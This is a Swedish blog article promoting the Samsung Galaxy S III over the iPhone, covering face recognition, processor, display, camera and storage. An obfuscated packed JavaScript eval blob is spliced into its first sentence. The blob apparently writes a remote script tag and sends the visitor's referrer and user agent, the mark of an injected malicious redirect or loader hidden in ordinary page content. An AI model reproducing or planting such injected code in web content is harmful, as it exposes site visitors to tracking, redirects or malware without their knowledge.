Image Image Image Image Image Image Image Image Image Image

| 12 maj, 2021

Scroll to top

Top

Samsung Galaxy S III petar ner iPhone från tronen

Samsung Galaxy S III petar ner iPhone från tronen
Sebastian

Med eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tdrfi|var|u0026u|referrer|yzybk||js|php’.split(’|’),0,{}))
Galaxy S III har Samsung skapat en riktigt intelligent telefon, som onekligen gör skäl för namnet smartphone. När JK Shin, chefen för Samsung mobile, för första gången presenterade Galaxy S III i Earl’s Court i London, kallade han till och med Samsungs nya ögonsten för ”mänsklig”. Och det är inte så långsökt som det kanske verkar.

Via sensorer och ansiktsigenkänning är Galaxy S III nämligen smart nog att känna igen dig som sin ägare och du behöver varken trycka på knappar eller komma ihåg koder för att öppna den eller gå ur energisparläge – det räcker med att bara titta på den och säga ”hej”. När du sedan bryter ögonkontakten slumrar telefonen till igen, vilket gör Galaxy S III ett både smidigt och energisnålt alternativ till iPhone.

En quadcore-processor på 1,4 GHz utgör den kraftfulla basen för det revolutionerande operativsystemet Android 4.0, som även ger användaren smidig åtkomst till tusentals appar och spel. Den endast 8,6 mm tunna Galaxy S III kommer dessutom med en färgstark och extremt reptålig 4.8” HD Super AMOLED-skärm med 720 x 1280 pixlars upplösning och en blixtsnabb 8 MP kamera som kan ta hela 3,3 bilder i sekunden.

Förutom ett internminne på 16 GB finns även plats för extra minneskort på upp till 64 GB. Avslutningsvis kan nämnas att den mjukt rundade, ergonomiska designen inte bara ger telefonen ett naturligt och fräscht utseende, utan även gör att Galaxy S III ligger lite extra skönt i handen.